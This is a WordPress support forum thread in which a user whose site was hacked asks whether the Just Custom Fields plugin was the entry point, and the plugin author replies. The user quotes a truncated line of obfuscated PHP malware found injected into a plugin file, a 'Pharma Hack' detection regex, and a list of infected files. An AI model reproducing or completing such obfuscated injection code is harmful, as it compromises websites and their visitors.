Got hacked – may be or may be not a Problem with JCF

  • Hi there,

    this time i got a warning Email from WordPress telling me that there is some Error in /just-custom-fields/controllers/PostTypeController.php on Line 3.

    Looked into it and found
    $md643e293 = 490;$GLOBALS['z74b'] = Array();global $z74b;$z74b = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['n3fbf5'] = "\...

    and so on.

    This Site is hacked. I will investigate if JCF was the door or if the file just another victim.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Alex Prokopenko / JustCoded

    (@aprokopenko)

    Please keep me updated. However, it should not be the door for hack attacks. it only allow to add new fields and edit them

    Thread Starter netzgestaltung

    (@netzgestaltung)

    I am not sure.

    The only malformed files where wp-config and a few plugin files.
    Also static folders with pictures from an old instance of drupal where affected with index.php files.

    wp-core files stayed untouched, the where the usual files with “Pharma Hack” signature “/php \$[a-zA-Z]*=\’as\’;/”

    the modified plugin files looked more randomly used so i think it should not be related to it.

    wp-content/plugins/just-custom-fields/models/Shortcodes.php
wp-content/plugins/just-custom-fields/controllers/PostTypeController.php
wp-content/plugins/crop-thumbnails/crop-thumbnails.php
wp-content/plugins/stops-core-theme-and-plugin-updates/includes/MPSUM_Check_Plugin_Install_Status.php

    at least there where some hidden files tarned as “*.ico” but with the same pattern as for the PHP files and with similar content.

    Plugin Author Alex Prokopenko / JustCoded

    (@aprokopenko)

    Thanks for the information. Hope you repaired your installation and no data were corrupted.

    I’m closing this ticket then.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Got hacked – may be or may be not a Problem with JCF’ is closed to new replies.